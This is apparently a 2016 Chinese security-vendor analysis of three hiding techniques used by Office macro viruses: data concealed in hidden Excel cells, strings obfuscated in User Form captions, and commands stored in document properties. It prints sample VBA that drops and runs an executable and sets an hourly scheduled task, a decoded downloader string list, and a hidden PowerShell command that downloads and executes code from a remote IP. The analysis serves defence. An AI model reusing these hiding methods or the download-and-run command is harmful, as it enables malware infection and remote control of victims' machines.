2016-05-23 19:25:10
来源:360安全播报 作者:360安全卫士
阅读:301次
点赞(0)
收藏
分享到:
作为一类古老的病毒,宏病毒随着勒索软件的兴起而卷土重来。尤其是在2016年,以Locky为代表的勒索软件利用Office宏肆虐传播,宏病毒也成为目前最活跃的病毒品种之一。
在与安全软件的对抗中,宏病毒使用了多种手段隐藏其恶意代码或数据,近期出现的新变种则是利用Excel表格的函数动态生成PE文件数据、设置远距离存放位置、隐藏显示、不同表切换等方式进行隐藏。接下来,360QEX引擎团队将对宏病毒代码流行的三类“隐身术”进行逐一揭秘。
0x01 Excel表格隐藏数据
样本文件md5: 48f202f903741e7a1722bfa6b4c051aa.xls
sha256: 083a05000c4b8e9a88a0ff8a95a3d9826dd389b440bb1781237ca124b0d986a7
virustotal 扫描结果:
样本对自身 VBAProject 进行了加密,
破解之后,看到了宏代码执行入口函数 Auto_Open,
SubAuto_Open() OnErrorResumeNext Application.DisplayAlerts=False DimWBAsWorkbook SetWB=ActiveWorkbook DimSh1,Sh2,sh3AsWorksheet SetSh1=WB.Sheets(1) SetSh2=WB.Sheets(2) Setsh3=WB.Sheets(3) DimstrAsString str=Sh2.Cells(996,40) DimtAsDate t=Now+TimeSerial(0,0,1) Application.OnTimet,str EndSub病毒作者使用 Application.OnTime 函数,间隔 1 秒,执行 字符串 “str” ,”str” 的值是从表格 Cells(996, 40) 中获取,当去查看表格中该处值时发现病毒更改了Excel单元格格式
,把数据隐藏显示。
单元格格式设置为三个 ;;; 时,单元格内容就会被隐藏。
单元格的格式默认是显示的,初始设置为,
去掉隐藏后,查看表格中该值是 Fnslr12 , 即病毒的功能入口函数名称,函数代码为,
SubFnslr12() OnErrorResumeNext Application.DisplayAlerts=False CallBuild Sheets(1).Select DimWBAsWorkbook SetWB=ActiveWorkbook DimSh1,Sh2,sh3AsWorksheet SetSh1=WB.Sheets(1) SetSh2=WB.Sheets(2) IfCells(2,1)<>""Then GoToskyhigh EndIf''' 以下省略
因此,该函数为病毒代码的主功能函数。
此函数的功能有,
1、
Call Build
调用 Build 函数, Build 函数功能为:在表格中动态生成,待写入 可执行文件(pe文件)所需的数据,其功能代码简略如下,
SubBuild() Sheets(2).Select SetWB=ActiveWorkbook SetSh1=WB.Sheets(1) SetSh2=WB.Sheets(2) 'boblocation i=Sh2.Cells(1000,12) j=Sh2.Cells(1000,13) 'indextablelocation R=Sh2.Cells(1000,10) C=Sh2.Cells(1000,11) Counter=R DoWhileSh2.Cells(Counter,C)<>"" IfSh2.Cells(Counter,C+1)<>""Then S1=Sh2.Cells(Counter,C) S2=Sh2.Cells(Counter,C+1) EndIf Counter=Counter+1 Loop Cells(i,j).Select Range(Selection,Selection.End(xlDown)).Select Selection.Cut Range("i1001").Select ActiveSheet.Paste Cells(1,1).Select EndSub函数运行结果为,在 1001 行往下,依次每行填入数据。
2、对是否运行过一次做检查,
IfCells(2,1)<>""Then GoToskyhigh EndIf当运行过一次之后, Cells(2,1) 表格会被写入值,会在这里进入语句 Then ,执行 “Goto skyhigh” 语句, “skyhigh” 标记定位在函数尾部,即执行该语句后会退出该函数。
3、从代码意图猜测,病毒作者想在 %userprofile% \AppData\Roaming\Microsoft\Templates 生成一个名为Macro1.vbs 的vbs文件 ,
DimFnslr1AsString DimFnslr2AsString Fnslr2=Environ(Sh2.Cells(998,40))&"\AppData\Roaming\Microsoft\Templates\Macro1.vbs" ChDrive(Fnslr2) IfDir(Fnslr2)=""Then Else EndIf其中,病毒拼凑生成文件的目录路径时,从表格 2 的Cells(998, 40) 中读取 ,该值为环境变量值 userprofile.
只是,病毒作者并没有继续完善相关代码。实际测试运行样本也并没有生成该文件,猜测可能作者后续加入该功能,或者该功能已经被取消。
4、在 %serprofile% \AppData\Roaming\Microsoft\Templates 目录生成可执行文件 Macro1.exe,
DimiAsDouble i=1000 Fnslr1="Macro1.exe" Fnslr2=Environ(Sh2.Cells(998,40))&"\AppData\Roaming\Microsoft\Templates" Fnslr3=FreeFile() OpenFnslr1ForBinaryAsFnslr3 DoWhileSh2.Cells(i,9)<>"" Fnslr11=Sh2.Cells(i,9) If(Fnslr9=True)Then Fnslr8=1 DoWhile(Fnslr8<Len(Fnslr11)) Fnslr6=Sh2.Cells(997,40)&Mid(Fnslr11,Fnslr8,3) Put#Fnslr3,,Fnslr6 Fnslr8=Fnslr8+3 Loop EndIf IfFnslr9=FalseThen Fnslr9=True EndIf i=i+1 Loop Close#Fnslr3 DimFnslr10AsString Fnslr10=Fnslr1 Fnslr7=Shell(Fnslr10,vbHide)写入 Macro1.exe 所需的数据,从 Excel 表格中 Cells(997, 40) 周围读取,实际测试数据开始位置是 1001行,
代码尾部使用 Shell 函数,启动生成的 Macro1.exe 。
文件信息
可执行文件是 x64位的,功能是,启动 powershell 附带 –enc 参数,执行一段 shellcode ,这段 shellcode是一个 reverse shell ,连接黑客服务器,等待下达命令。
此部分与下面创建计划任务不间断运行的功能呼应起来,此部分不是本文重点,不再详述。
5、在 %serprofile% \AppData\Roaming\Microsoft\Templates 目录生成 bat (cmd) 批处理脚本文件 Macro1.bat,
Fnslr2=Environ(Sh2.Cells(998,40))&"\AppData\Roaming\Microsoft\Templates" DimUserAsString User=Environ(Sh2.Cells(998,40)) Fname=Fnslr2&"\Macro1.bat" FNum=FreeFile OpenFnameForOutputAccessWriteAs#FNum WholeLine="SchTasks/Create/SCHOURLY/TN"&Sh2.Cells(1000,3)&"Macro1"&Sh2.Cells(1000,3)&"/TR"&""&User&"\AppData\Roaming\Microsoft\Templates"&"\Macro1.exe/ST01:00" Print#FNum,WholeLine Close#FNum DimTempFileNameAsString TempFileName=Fnslr2&"\Macro1.bat" ShellTempFileName,vbHide尾部使用 Shell 函数 启动该脚本,结果是在用户机器创建了一个计划任务, 每隔一小时运行一次 上面生成的 Macro1.exe 。
6、弹窗显示输入密码才能继续进行运行,
pword=InputBox("Pleaseenterapasswordtoproceed","PasswordRequired","*******") SelectCasepword CaseIs="" MsgBox"TryAgain" Case"Alon2016" RP=1 CaseIs<>"Alon2016" MsgBox"TryAgain" EndSelect从病毒代码中知道,要求输入的密码是 “Alon2016” 。
7、接下来是现场清理和掩饰,删除调用Build 函数在表格生成的数据,在表格的开头显著位置填入在其他表格中保存的邮件收件人地址信息,
小结:该样本的特别之处有,1、PE文件数据是使用函数动态生成,2、数据存放在Excel表格中,使用隐藏显示,3、数据存放位置很远,不容易被看到,4、病毒在不同的excel表中切换,给分析人员调试VBA代码增加困难,5,病毒运行完毕,清理现场,显示邮件地址列表,掩饰自身。
0x02 VBA User Form隐藏代码
此类病毒把部分代码隐藏到 VBA 工程中的 用户控件(User Form)中,甚至把带有代码的控件最小化,使之不易被看到。
样本文件md5:9266db6c7772f6c45411ff3a591b1374
sha256 : 9d11f2d2f0e0e5fd8a2ef552a5521920767d7939881443435296d0c600e4a71a
virustotal 扫描结果:
查看该文件的宏,
此文件看起来像是正常的SQL操作类的宏代码,但是当我们查看窗体 Ultra 时发现,
有个控件的Caption中存放了可疑数据如下,
D!icrobrioft.XD!LHTTP10)Adodb.britr00aD!10)brih00ll.Application10)Wbricript.brih00ll10)Proc00bribri10)G00T10)T00D!P10)Typ0010)op00n10)writ0010)r00briponbri00Body10)briav00tofil0010)\hendib00.00x00
此数据在宏代码中被使用的位置为,
CadenaCurrency(Ultra.CommandButton3.Caption,"00","e") 其中,CadenaCurrency是一个简单的Replace调用, PublicFunctionCadenaCurrency(A1AsString,A2AsString,A3AsString)AsString CadenaCurrency=Replace(A1,A2,A3) EndFunction解密方法是,
DimaproblemsAsString aproblems=CadenaCurrency(Ultra.CommandButton3.Caption,"00","e") aproblems=CadenaCurrency(aproblems,"D!","M") aproblems=CadenaCurrency(aproblems,"bri","s") constans_problems=Split(aproblems,"10)")解密为,
Microsoft.XMLHTTP Adodb.stream shell.Application Wscript.shell Process GeT Temp Type open write responseBody savetofile \hendibe.exe几个字符串呈现出非常明显的意图,下载(Microsoft.XMLHTTP)+ 写文件(Adodb.stream)+ 执行(shell.Application / Wscript.shell)。
此样本因为代码有问题,没能成功运行起来。找到宏代码中使用 Microsoft.XMLHTTP 对象下载文件的位置,加上断点调试,起先因为作者疏忽,忘记书写一个双引号,导致编译失败,
之后,运行到下载文件处时,出现了报错。
0x03文档内建属性隐藏代码
此类病毒把代码核心恶意部分放入文档的内建属性中。
样本文件md5:0ce81eda6b6886163cf5dadffecc0df9
sha256: 23d07a51f7a14a95a1efc55ad3f18cd5a71607156cd325256d43f0b68cfb62cd
virustotal 扫描结果:
此样本的vba 宏代码只有1个文件,很简短,
AttributeVB_Name="NewMacros" SubAuto_Open() Callwinshell EndSub SubAutoOpen() Callwinshell EndSub Functionwinshell()AsObject OnErrorResumeNext Err.Clear DimpsAsString ps=ActiveDocument.BuiltInDocumentProperties("Manager").Value DimObjAsObject SetObj=CreateObject("WScript.Shell") Obj.Runps,0 Application.DisplayAlerts=False EndFunction响应两个文档打开事件,AutoOpen 与Auto_Open,直接执行 winshell函数, winshell函数读取文件内建属性,Manager 的值,直接执行起来。Manager值,我们使用右键文件属性,查看为,
powershell.exe -nop -w hidden -c $b=new-object net.webclient;$b.proxy=[Net.WebRequest]::GetSystemWebProxy();$b.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $b.downloadstring('http://37.28.154.204:8081/ygklKbyIVG51Kol');
是一段 Powershell 执行的脚本代码,从指定 URL (http://37.28.154.204:8081/ygklKbyIVG51Kol) 下载文件。目前测试此URL已经无法访问。
0x04 总结
以加密勒索为代表的病毒,越来越多的使用Office宏,js,vbs等非Pe文件来传播。通过脚本代码动态向windows 目录中释放可执行文件或者从服务器下载可执行文件。
非PE病毒查杀引擎QEX是 360安全产品中负责查杀宏病毒及vbs、js、html等脚本病毒的独有引擎。上述样本QEX引擎均已查杀。
在这里也提醒 Microsoft Office 文档系列软件的使用用户,
1、如日常无使用宏的需求,请禁用 Office 宏,禁用方式参考 https://support.office.com/zh-cn/article/%E5%90%AF%E7%94%A8%E6%88%96%E7%A6%81%E7%94%A8-Office-%E6%96%87%E6%A1%A3%E4%B8%AD%E7%9A%84%E5%AE%8F-7b4fdd2e-174f-47e2-9611-9efe4f860b12
2、对于经常使用宏工作的用户,请安装安全软件,定期更新病毒库,对于他人发送的文档,在打开之前请先扫描。
0x05 Reference
https://blogs.technet.microsoft.com/mmpc/2016/05/17/malicious-macro-using-a-sneaky-new-trick/
http://www.CodeSec.Net/articles/system/104221.html
https://www.fireeye.com/blog/threat-research/2016/04/ghosts_in_the_endpoi.html
http://superuser.com/questions/807926/how-to-bypass-the-vba-project-password-from-excel
https://support.office.com/zh-cn/article/%E5%90%AF%E7%94%A8%E6%88%96%E7%A6%81%E7%94%A8-Office-%E6%96%87%E6%A1%A3%E4%B8%AD%E7%9A%84%E5%AE%8F-7b4fdd2e-174f-47e2-9611-9efe4f860b12
http://bobao.360.cn/learning/detail/2827.html
本文由 360安全播报 原创发布,如需转载请注明来源及本文地址。本文地址:http://bobao.360.cn/learning/detail/2880.html